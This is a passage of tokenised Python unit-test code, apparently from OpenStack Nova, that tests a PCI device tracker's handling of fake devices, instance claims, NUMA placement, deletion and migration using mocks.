name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|_create_fake_instance
indent|' '
name|'def'
name|'_create_fake_instance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'inst'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance1'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'pci_devices'
op|'='
name|'objects'
op|'.'
name|'PciDeviceList'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'task_state'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|_fake_get_pci_devices
dedent|''
name|'def'
name|'_fake_get_pci_devices'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'fake_db_devs'
op|'['
op|':'
op|']'
newline|'\n'
nl|'\n'
DECL|member|_fake_pci_device_update
dedent|''
name|'def'
name|'_fake_pci_device_update'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|','
name|'address'
op|','
name|'value'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'update_called'
op|'+='
number|'1'
newline|'\n'
name|'self'
op|'.'
name|'called_values'
op|'='
name|'value'
newline|'\n'
name|'fake_return'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_db_dev'
op|')'
newline|'\n'
name|'return'
name|'fake_return'
newline|'\n'
nl|'\n'
DECL|member|_fake_pci_device_destroy
dedent|''
name|'def'
name|'_fake_pci_device_destroy'
op|'('
name|'self'
op|','
name|'ctxt'
op|','
name|'node_id'
op|','
name|'address'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'destroy_called'
op|'+='
number|'1'
newline|'\n'
nl|'\n'
DECL|member|_create_pci_requests_object
dedent|''
name|'def'
name|'_create_pci_requests_object'
op|'('
name|'self'
op|','
name|'mock_get'
op|','
name|'requests'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'instance_uuid'
op|'='
name|'instance_uuid'
name|'or'
name|'uuidsentinel'
op|'.'
name|'instance1'
newline|'\n'
name|'pci_reqs'
op|'='
op|'['
op|']'
newline|'\n'
name|'for'
name|'request'
name|'in'
name|'requests'
op|':'
newline|'\n'
indent|' '
name|'pci_req_obj'
op|'='
name|'objects'
op|'.'
name|'InstancePCIRequest'
op|'('
name|'count'
op|'='
name|'request'
op|'['
string|"'count'"
op|']'
op|','
nl|'\n'
name|'spec'
op|'='
name|'request'
op|'['
string|"'spec'"
op|']'
op|')'
newline|'\n'
name|'pci_reqs'
op|'.'
name|'append'
op|'('
name|'pci_req_obj'
op|')'
newline|'\n'
dedent|''
name|'mock_get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstancePCIRequests'
op|'('
nl|'\n'
name|'instance_uuid'
op|'='
name|'instance_uuid'
op|','
nl|'\n'
name|'requests'
op|'='
name|'pci_reqs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|setUp
dedent|''
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'PciDevTrackerTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'fake_context'
op|'='
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.pci_device_get_all_by_node'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_get_pci_devices'
op|')'
newline|'\n'
comment|'# The fake_pci_whitelist must be called before creating the fake'
nl|'\n'
comment|'# devices'
nl|'\n'
name|'patcher'
op|'='
name|'pci_fakes'
op|'.'
name|'fake_pci_whitelist'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'addCleanup'
op|'('
name|'patcher'
op|'.'
name|'stop'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_fake_instance'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_pcidev_tracker_create
dedent|''
name|'def'
name|'test_pcidev_tracker_create'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|'.'
name|'keys'
op|'('
op|')'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stats'
op|'.'
name|'pools'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'node_id'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'nova'
op|'.'
name|'objects'
op|'.'
name|'PciDeviceList'
op|','
string|"'get_by_compute_node'"
op|')'
newline|'\n'
DECL|member|test_pcidev_tracker_create_no_nodeid
name|'def'
name|'test_pcidev_tracker_create_no_nodeid'
op|'('
name|'self'
op|','
name|'mock_get_cn'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mock_get_cn'
op|'.'
name|'called'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'nova'
op|'.'
name|'objects'
op|'.'
name|'PciDeviceList'
op|','
string|"'get_by_compute_node'"
op|')'
newline|'\n'
DECL|member|test_pcidev_tracker_create_with_nodeid
name|'def'
name|'test_pcidev_tracker_create_with_nodeid'
op|'('
name|'self'
op|','
name|'mock_get_cn'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
name|'node_id'
op|'='
number|'1'
op|')'
newline|'\n'
name|'mock_get_cn'
op|'.'
name|'assert_called_once_with'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.pci.whitelist.Whitelist.device_assignable'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'True'
op|')'
newline|'\n'
DECL|member|test_update_devices_from_hypervisor_resources
name|'def'
name|'test_update_devices_from_hypervisor_resources'
op|'('
name|'self'
op|','
name|'_mock_dev_assign'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|']'
newline|'\n'
name|'fake_pci_devs_json'
op|'='
name|'jsonutils'
op|'.'
name|'dumps'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'tracker'
op|'.'
name|'update_devices_from_hypervisor_resources'
op|'('
name|'fake_pci_devs_json'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_new_dev
dedent|''
name|'def'
name|'test_set_hvdev_new_dev'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.4'"
op|','
name|'vendor_id'
op|'='
string|"'v2'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_1'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'4'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'address'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'0000:00:00.1'"
op|','
string|"'0000:00:00.2'"
op|','
nl|'\n'
string|"'0000:00:00.3'"
op|','
string|"'0000:00:00.4'"
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|','
string|"'v2'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_changed
dedent|''
name|'def'
name|'test_set_hvdev_changed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_pci_v2'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v1'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_v2'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_hvdev_remove
dedent|''
name|'def'
name|'test_set_hvdev_remove'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
op|'['
name|'fake_pci'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
op|'['
name|'dev'
name|'for'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
nl|'\n'
name|'if'
name|'dev'
op|'.'
name|'status'
op|'=='
string|"'removed'"
op|']'
op|')'
op|','
nl|'\n'
number|'2'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_set_hvdev_changed_stal
name|'def'
name|'test_set_hvdev_changed_stal'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'fake_pci_3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v2'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'stale'
op|'['
string|"'0000:00:00.2'"
op|']'
op|'['
string|"'vendor_id'"
op|']'
op|','
string|"'v2'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_active
name|'def'
name|'test_update_pci_for_instance_active'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claims'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'allocations'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_fail
name|'def'
name|'test_update_pci_for_instance_fail'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pci_requests'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'pci_requests'
op|'['
number|'0'
op|']'
op|'['
string|"'count'"
op|']'
op|'='
number|'4'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claims'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|','
nl|'\n'
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'allocations'
op|'['
name|'self'
op|'.'
name|'inst'
op|'['
string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'devs'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_pci_claim_instance_with_numa
name|'def'
name|'test_pci_claim_instance_with_numa'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_db_dev_3'
op|'='
name|'dict'
op|'('
name|'fake_db_dev_1'
op|','
name|'id'
op|'='
number|'4'
op|','
name|'address'
op|'='
string|"'0000:00:00.4'"
op|')'
newline|'\n'
name|'fake_devs_numa'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_db_devs'
op|')'
newline|'\n'
name|'fake_devs_numa'
op|'.'
name|'append'
op|'('
name|'fake_db_dev_3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_devs_numa'
op|')'
newline|'\n'
name|'pci_requests'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_requests'
op|')'
op|'['
op|':'
number|'1'
op|']'
newline|'\n'
name|'pci_requests'
op|'['
number|'0'
op|']'
op|'['
string|"'count'"
op|']'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'objects'
op|'.'
name|'InstanceNUMATopology'
op|'('
nl|'\n'
name|'cells'
op|'='
op|'['
name|'objects'
op|'.'
name|'InstanceNUMACell'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'cpuset'
op|'='
name|'set'
op|'('
op|'['
number|'1'
op|','
number|'2'
op|']'
op|')'
op|','
name|'memory'
op|'='
number|'512'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'v1'"
op|','
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'v1'"
op|','
name|'free_devs'
op|'['
number|'1'
op|']'
op|'.'
name|'vendor_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_pci_claim_instance_with_numa_fail
name|'def'
name|'test_pci_claim_instance_with_numa_fail'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'objects'
op|'.'
name|'InstanceNUMATopology'
op|'('
nl|'\n'
name|'cells'
op|'='
op|'['
name|'objects'
op|'.'
name|'InstanceNUMACell'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'cpuset'
op|'='
name|'set'
op|'('
op|'['
number|'1'
op|','
number|'2'
op|']'
op|')'
op|','
name|'memory'
op|'='
number|'512'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
nl|'\n'
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_deleted
name|'def'
name|'test_update_pci_for_instance_deleted'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'DELETED'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
op|'-'
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_migration_in
name|'def'
name|'test_update_pci_for_migration_in'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_migration_out
name|'def'
name|'test_update_pci_for_migration_out'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
op|'-'
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'PciDevice'
op|','
string|"'should_migrate_data'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|member|test_save
name|'def'
name|'test_save'
op|'('
name|'self'
op|','
name|'migrate_mock'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_update'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_update'
op|')'
newline|'\n'
name|'fake_pci_v3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v3'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
